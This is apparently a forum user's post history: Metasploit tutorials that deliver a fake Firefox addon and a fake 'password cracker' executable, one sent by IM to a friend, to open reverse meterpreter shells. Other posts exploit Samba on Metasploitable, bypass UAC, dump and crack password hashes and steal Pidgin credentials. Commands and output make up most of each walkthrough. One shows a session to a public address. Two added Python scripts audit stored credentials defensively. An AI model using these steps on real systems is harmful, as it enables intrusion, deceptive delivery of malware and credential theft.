
crossbower

Members
  • Posts

    17
  • Joined

  • Last visited

About crossbower

  • Birthday 08/08/1983

Converted

  • Interests
    Developer and Penetration Tester
  • Location
    Italy


crossbower's Achievements

Newbie (1/14)

Reputation: 22

  1. Mozilla Firefox Bootstrapped Addon Platform: victim=Windows 7 / attacker=Kali Linux
     Rank: Excellent
     Privileged: No / but with payload windows/meterpreter/reverse_tcp YES
     Mission: getsystem access with SYSTEM privileges, get Pidgin creds, get hashdump and crack the hash, get Firefox history stolen creds

     Description: This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.

     References:
     https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions
     TippingPoint | DVLabs | XPI: The next malware vector?

     First step: we start the services and run msfconsole

       root@kali:~# service postgresql start && service metasploit start && msfconsole

     We search for firefox_xpi, finding the bootstrapped addon exploit:

       msf > search firefox_xpi
       Matching Modules
       ================
       exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 00:00:00 UTC excellent Mozilla Firefox Bootstrapped Addon Social Engineering Code Executio

     We will be configuring the exploit:

       Basic options:
       Name       Current Setting
       ----       ---------------
       ADDONNAME  HTML5 Rendering Enhancements
       SRVHOST    The local host to listen on.
       SRVPORT    The local port to listen on.
       URIPATH    The URI to use for this exploit

     In the video tutorial it is configured for a facebook photo viewer:

       ADDONNAME  facebook hidden foto viewer
       SRVHOST    192.168.1.19
       SRVPORT    80
       URIPATH    /facebook-photo-viewer.xpi

       msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
       msf exploit(firefox_xpi_bootstrapped_addon) > set ADDONNAME facebook hidden foto viewer
       ADDONNAME => facebook hidden foto viewer
       msf exploit(firefox_xpi_bootstrapped_addon) > set SRVHOST 192.168.1.19
       SRVHOST => 192.168.1.19
       msf exploit(firefox_xpi_bootstrapped_addon) > set SRVPORT 80
       SRVPORT => 80
       msf exploit(firefox_xpi_bootstrapped_addon) > set URIPATH /facebook-photo-viewer.xpi
       URIPATH => /facebook-photo-viewer.xpi
       msf exploit(firefox_xpi_bootstrapped_addon) >

     Set up a listener payload without official payloads:

       PAYLOAD  windows/meterpreter/reverse_tcp
       LHOST    192.168.1.19
       LPORT    443

       msf exploit(firefox_xpi_bootstrapped_addon) > set PAYLOAD windows/meterpreter/reverse_tcp
       PAYLOAD => windows/meterpreter/reverse_tcp
       msf exploit(firefox_xpi_bootstrapped_addon) > set LHOST 192.168.1.19
       LHOST => 192.168.1.19
       msf exploit(firefox_xpi_bootstrapped_addon) > set LPORT 443

     Set up the available targets:

       0  Universal (Javascript XPCOM Shell)
       1  Windows x86 (Native Payload)
       2  Windows x64 (Native Payload)
       3  Linux x86 (Native Payload)
       4  Linux x64 (Native Payload)
       5  Mac OS X PPC (Native Payload)

       msf exploit(firefox_xpi_bootstrapped_addon) > set TARGETS 1
       TARGETS => 1
       msf exploit(firefox_xpi_bootstrapped_addon) > exploits -j

     And run the exploit; the exploit creates a .xpi addon which will be presented to the victim via a web page. Once the victim clicks "install", the addon is installed and executes the payload with full user permissions.

       msf exploit(firefox_xpi_bootstrapped_addon) > exploit
       [*] Exploit running as background job.
       [*] Started reverse handler on 192.168.1.19:443
       msf exploit(firefox_xpi_bootstrapped_addon) >
       [*] Using URL: http://192.168.1.19:80/facebook-photo-viewer.xpi
       [*] Server started.
       [*] 192.168.1.202 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'..
       [*] 192.168.1.202 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'..
       [*] Sending stage (769024 bytes) to 192.168.1.202
       [*] Meterpreter session 1 opened (192.168.1.19:443 -> 192.168.1.202:49207)

     Now the game started: hunting for Pidgin creds, hashdump and Firefox creds. Interact with meterpreter session 1 >> getsystem for obtaining SYSTEM privileges. We search for a service running with SYSTEM privileges on the remote system and migrate into that process. I used PID nr 2980:

       2980  468  svchost.exe  x86  0  NT AUTHORITY\SYSTEM

       meterpreter > getsystem
       ...got system (via technique 1).
       meterpreter > migrate 2980
       [*] Migrating from 1560 to 2980..
       [*] Migration completed successfully.
       meterpreter > getuid
       Server username: NT AUTHORITY\SYSTEM
       meterpreter >

     Now the system is ready for extracting the creds: Firefox, Pidgin and hashdump. Now put the opened session in the background and extract the Firefox creds, using the post exploitation module windows/gather/forensics/browser_history:

       meterpreter > background
       [*] Backgrounding session 1...
       msf exploit(bypassuac) > use windows/gather/forensics/browser_history
       msf post(browser_history) > set SESSION 1
       SESSION => 1
       msf post(browser_history) > exploit -j

     This module searches creds in Firefox, Chrome, Skype:

       [*] Gathering user profiles
       [*] Checking for Chrome History artifacts...
       [-] Chrome History directory not found for redmon
       [*] Checking for Chrome Archived History artifacts...
       [-] Chrome Archived History directory not found for redmon
       [*] Checking for Skype artifacts...
       [-] Skype directory not found for redmon
       [*] Checking for Firefox artifacts...
       [+] Firefox directory found redmon
       [*] Downloading C:\Users\redmon\AppData\Roaming\Mozilla\Firefox\Profiles\3dtmxh0g.default\places.sqlite
       [+] Firefox artifact file saved to /root/.msf4/local/redmon_Firefox_3dtmxh0g.default_places.sqlite
       [*] Post module execution completed

     DONE

     Now we use a post exploitation module for Pidgin creds:

       msf post(browser_history) > use post/multi/gather/pidgin_cred
       msf post(pidgin_cred) > set CONTACTS 1
       CONTACTS => 1
       msf post(pidgin_cred) > set SESSION 1
       SESSION => 1
       msf post(pidgin_cred) >
       [*] Checking for Pidgin profile in: C:\Users\redmon\AppData\Roaming
       [*] Found C:\Users\redmon\AppData\Roaming\.purple
       [*] Reading accounts.xml file from C:\Users\redmon\AppData\Roaming\.purple
       [*] Collected the following credentials:
       [*] Server: <unknown>:5222
       [*] Protocol: prpl-jabber
       [*] Username: msftester@exploit.im
       [*] Password: unixunix
       [*] Collected the following contacts:
       [*] Buddy Name: wuala@jabber.ru
       [*] Alias: wuala
       [*] Protocol: prpl-jabber
       [*] Account: msftester@exploit.im
       [*] Post module execution completed

     DONE

     Now we use post exploitation to extract the hashdump and crack it. We need to return to the opened session:

       msf post(pidgin_cred) > sessions -i 1
       [*] Starting interaction with 1...
       meterpreter > hashdump
       Administrator:500:aad3b435b51404eeaad3b435b51404ee:b963c57010f218edc2cc3c229b5e4d0f:::
       Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
       HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404ee:f08f62a151d0b888dd5fe91187c3d968:::
       redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
       meterpreter >

     NOW cracking the hashes:

       root@kali:~# echo "Administrator:500:aad3b435b51404eeaad3b435b51404ee:b963c57010f218edc2cc3c229b5e4d0f:::
       Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
       HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404ee:f08f62a151d0b888dd5fe91187c3d968:::
       redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
       " >> pass.txt
       root@kali:~# john --format=nt pass.txt
       Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
       123456           (redmon)
       iloveyou         (Administrator)

     DONE

     Have fun and thanks for watching and reading my tuts.
     http://www.youtube.com/watch?v=0DNBvPTBmow
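The pidgin_cred output in the post above shows why Pidgin accounts are worth auditing: accounts.xml under the .purple directory keeps the account password in cleartext when "remember password" is used. The following Python script is an added example, not code from the post or from Pidgin, that lets a user or administrator audit their own accounts.xml and list which accounts carry a stored cleartext password. The sample document is constructed here and the element layout (an outer <account> list holding <account> entries with <protocol>, <name> and <password> children) is an assumption about the file format.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on Pidgin's accounts.xml layout (assumption:
# outer <account> element with one <account> child per configured account).
# Values are placeholders, not real credentials.
SAMPLE_ACCOUNTS_XML = """<account version='1.0'>
  <account>
    <protocol>prpl-jabber</protocol>
    <name>tester@example.invalid/Home</name>
    <password>not-a-real-password</password>
  </account>
  <account>
    <protocol>prpl-irc</protocol>
    <name>tester@irc.example.invalid</name>
  </account>
</account>
"""


def audit_pidgin_accounts(xml_text):
    """Return (protocol, account name, has_cleartext_password) per account."""
    root = ET.fromstring(xml_text)
    findings = []
    for acct in root.findall("account"):
        protocol = acct.findtext("protocol", default="?")
        name = acct.findtext("name", default="?")
        # A non-empty <password> element means the secret sits on disk in the clear.
        password = acct.findtext("password")
        findings.append((protocol, name, bool(password)))
    return findings


def cleartext_accounts(xml_text):
    """Names of accounts whose password is stored in cleartext in accounts.xml."""
    return [name for _, name, stored in audit_pidgin_accounts(xml_text) if stored]


if __name__ == "__main__":
    # Replace SAMPLE_ACCOUNTS_XML with open(path_to_accounts_xml).read() to audit a real profile.
    for protocol, name, stored in audit_pidgin_accounts(SAMPLE_ACCOUNTS_XML):
        status = "CLEARTEXT PASSWORD ON DISK" if stored else "no stored password"
        print(f"{protocol:12} {name:40} {status}")
```

Any account listed as storing a cleartext password can be read by anything running as that user, which is exactly what the post module above does; the mitigation is to not save the password in Pidgin (or to use a keyring-backed build) and to rotate any password that has already been stored this way.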
  2. Nice tutorial, but edit it and credit the original author: Dual-boot Windows 7 and Kali Linux | LinuxBSDos.com
  3. Pentest on Metasploitable 2

     The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

       root@kali:~# netdiscover -i wlan1 -r 192.168.1.1/24
       Currently scanning: 192.168.1.0/24 | Screen View: Unique Hosts
       8 Captured ARP Req/Rep packets, from 8 hosts. Total size: 372
       _____________________________________________________________________________
       IP             At MAC Address     Count  Len  MAC Vendor
       -----------------------------------------------------------------------------
       192.168.1.91   08:00:27:4a:6c:50  01     042  CADMUS COMPUTER SYSTEMS
       192.168.1.202  08:00:27:32:43:96  01     042  CADMUS COMPUTER SYSTEMS
       192.168.1.1    00:25:53:3e:bc:b9  01     042  Unknown vendor
       192.168.1.100  00:09:f8:65:35:64  01     060  UNIMO TECHNOLOGY CO., LTD.
       192.168.1.132  00:21:9b:20:a3:bb  01     060  Unknown vendor

     Using the nmap scanner to identify the Samba service on port 139:

       root@kali:~# nmap -p 139 -sV 192.168.1.91
       Starting Nmap 6.40 ( http://nmap.org )
       Nmap scan report for 192.168.1.91
       Host is up (0.00017s latency).
       PORT     STATE SERVICE     VERSION
       139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
       MAC Address: 08:00:27:4A:6C:50 (Cadmus Computer Systems)

     And play the game:

       root@kali:~# service postgresql start && service metasploit start && msfconsole
       msf > use exploit/multi/samba/usermap_script
       msf exploit(usermap_script) > show options
       Module options (exploit/multi/samba/usermap_script):
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST                   yes       The target address
       RPORT  139              yes       The target port
       Exploit target:
       Id  Name
       --  ----
       0   Automatic
       msf exploit(usermap_script) > set RHOST 192.168.1.91
       RHOST => 192.168.1.91
       msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
       PAYLOAD => cmd/unix/reverse
       msf exploit(usermap_script) > set LHOST 191.168.1.19
       LHOST => 191.168.1.19
       msf exploit(usermap_script) >
       msf exploit(usermap_script) > exploit
       [*] Started reverse double handler
       [*] Accepted the first client connection...
       [*] Accepted the second client connection...
       [*] Command: echo BgB1yKJSt3wbArQy;
       [*] Writing to socket A
       [*] Writing to socket B
       [*] Reading from sockets...
       [*] Reading from socket A
       [*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nBgB1yKJSt3wbArQy\r\n"
       [*] Matching...
       [*] B is input...
       [*] Command shell session 1 opened (192.168.1.19:4444 -> 192.168.1.91:42504)

     VIDEO TUT http://www.youtube.com/watch?v=S3uvS3qEpm8
  4. Binary Payloads

     It seems like Metasploit is full of interesting and useful features. One of these is the ability to generate an executable from a Metasploit payload. This can be very useful in situations such as social engineering: if you can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any software.

     Example with a little joke: my friend needed a good passwd cracker. I created for him the best passwd cracker.

     How to create a binary payload: Binary Payloads - Metasploit Unleashed

     We generate a Windows meterpreter executable that will connect back to us on port 443:

       msfpayload -p windows/meterpreter/reverse_tcp LHOST=192.168.1.19 LPORT=443 X > /root/cracker.exe

     Now the Windows executable is created, we will use 'exploit/multi/handler', which is a stub that handles exploits launched outside of the framework.

       msf > use exploit/multi/handler
       msf exploit(handler) > set payload windows/shell/reverse_tcp
       payload => windows/shell/reverse_tcp
       msf exploit(handler) > set LHOST 192.168.1.19
       LHOST => 192.168.1.19
       msf exploit(handler) > set LPORT 443
       LPORT => 443
       msf exploit(handler) > exploit

     And the listener started, waiting for a victim:

       msf exploit(handler) > exploit
       [*] Started reverse handler on 192.168.1.19:443
       [*] Starting the payload handler...
       [*] Sending stage (474 bytes)
       [*] Command shell session 1 opened (192.168.1.91:443 -> 192.168.1.19:3250)

     And I delivered it via IM to "my friend"; he executed the binary payload and the game started for hunting the hashdump.

     Metasploit has a Meterpreter script, 'getsystem', that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. More info on privilege escalation here: Privilege Escalation - Metasploit Unleashed

     Before we take a hashdump we need to be running with SYSTEM privileges.

       meterpreter > getuid
       Server username: redmon-PC\redmon

     This session I put in the background (session 1) and I used the meterpreter module bypassuac.
     Reference: Bypass Windows 7 x86/x64 UAC Fully Patched - Meterpreter Module ?
     Source: Windows Escalate UAC Protection Bypass

       msf > use exploit/windows/local/bypassuac
       msf exploit(bypassuac) > set SESSION 1
       msf exploit(bypassuac) > set PAYLOAD windows/meterpreter/revers_tcp
       payload => windows/meterpreter/reverse_tcp
       msf exploit(bypassuac) > set LHOST 192.168.1.19
       LHOST => 192.168.1.19
       msf exploit(bypassuac) > set LPORT 8989
       LPORT => 8989
       msf exploit(bypassuac) > exploit
       [*] Started reverse handler on 192.168.1.19:5555
       [*] UAC is Enabled, checking level...
       [+] UAC is set to Default
       [+] BypassUAC can bypass this setting, continuing...
       [*] Checking admin status...
       [+] Part of Administrators group! Continuing...
       [*] Uploading the bypass UAC executable to the filesystem...
       [*] Meterpreter stager executable 73802 bytes long being uploaded..
       [*] Uploaded the agent to the filesystem....
       [*] Sending stage (769024 bytes) to 192.168.1.202
       [*] Meterpreter session 2 opened (192.168.1.19:5555 -> 192.168.1.202:49171)

     Now migrate into one of the processes which is running with SYSTEM privileges. Running the ps command we see a process we need for SYSTEM privs:

       1996  448  SearchIndexer.exe  x86  0  NT AUTHORITY\SYSTEM

     Migrating to the process SearchIndexer.exe:

       meterpreter > migrate 1996
       [*] Migrating from 3456 to 1996...
       [*] Migration completed successfully.

     Now we run the 'getsystem' techniques to attempt to gain SYSTEM level privileges:

       meterpreter > getsystem
       ...got system (via technique 1).
       meterpreter > getuid
       Server username: NT AUTHORITY\SYSTEM

     NOW THE SYSTEM IS READY FOR ME TO TAKE A HASHDUMP

       meterpreter > hashdump
       Administrator:500:aad3b435b51404eeaad3b435b51404ee:b963c57010f218edc2cc3c229b5e4d0f:::
       Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
       HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404ee:f08f62a151d0b888dd5fe91187c3d968:::
       redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

     The hashes I cracked with the john passwd cracker. Metasploit has jtr modules for cracking.

     Sorry for mistakes, I was tired and still working at the workplace.

     VIDEO TUT: http://www.youtube.com/watch?v=j6dZIrO0890
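Both the first and the fourth post end with the same four hashdump lines and a john run against them. For anyone reviewing such a dump from their own lab or an authorized assessment, the useful defender's reading is what the hashes say before any cracking happens: the LM field aad3b435b51404eeaad3b435b51404ee is the LM hash of the empty string, meaning LM storage is disabled (good), and an NT field of 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty string, meaning the account has a blank password. The Python script below is an added example, not code from the posts or from Metasploit, that parses pwdump-format lines and produces audit findings; the sample input is the dump shown above (a lab VM), and lines whose hash field was wrapped or corrupted when pasted are skipped rather than misreported.

```python
# Well-known hashes of the empty string (facts about LM and NT hashing, not page-specific values).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM storage disabled for this account
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": the account has a blank password

# Sample input: the hashdump lines shown in the posts above (Windows 7 lab VM).
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b963c57010f218edc2cc3c229b5e4d0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404ee:f08f62a151d0b888dd5fe91187c3d968:::
redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
"""


def parse_hashdump(text):
    """Parse 'user:rid:lmhash:nthash:::' lines; skip blank, malformed or wrapped entries."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        # A hash that was wrapped across lines when pasted is no longer 32 hex chars; do not guess.
        if len(lm) != 32 or len(nt) != 32 or not rid.isdigit():
            continue
        entries.append({
            "user": user,
            "rid": int(rid),
            "lm_stored": lm != EMPTY_LM,      # True means a crackable LM hash is kept on disk
            "blank_password": nt == EMPTY_NT,  # True means no password at all
        })
    return entries


def audit_findings(text):
    """Map each account to the list of issues an auditor should raise about it."""
    findings = {}
    for e in parse_hashdump(text):
        reasons = []
        if e["blank_password"]:
            reasons.append("blank password")
        if e["lm_stored"]:
            reasons.append("LM hash stored (weak legacy hash)")
        if e["rid"] == 500:
            reasons.append("built-in Administrator account (RID 500)")
        findings[e["user"]] = reasons
    return findings


if __name__ == "__main__":
    for user, reasons in audit_findings(SAMPLE_HASHDUMP).items():
        print(f"{user:16} {'; '.join(reasons) if reasons else 'no immediate finding'}")
```

On the dump from the posts this reports Guest as having a blank password and flags the RID 500 account, while confirming no LM hashes are stored; the remaining NT hashes only become a finding once john shows, as in the posts, that they correspond to dictionary passwords like 123456 and iloveyou.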
  5. I see you got banned, which honestly I am glad about with all my heart. Welcome Back
  6. Good tutorial Nytro, but I can't manage to use them. As can also be seen in the tutorial, it uses the post/linux/gather/hashdump module, but the hashdump module can only be used if we have root access!!

       [*] Exploit running as background job.
       [*] Started reverse handler on xxx.xxx.xxx.xxx:443
       [*] Starting the payload handler..
       [*] Sending stage (39217 bytes) to 195.234.171.250...
       [*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:443 -> 195.234.171.250:34911)
       msf > use post/linux/gather/hashdump
       msf post(hashdump) > set VERBOSE 1
       VERBOSE => 1
       msf post(hashdump) > set SESSION 1
       SESSION => 1
       msf post(hashdump) > run -j
       [*] Post module running as background job
       [-] You must run this module as root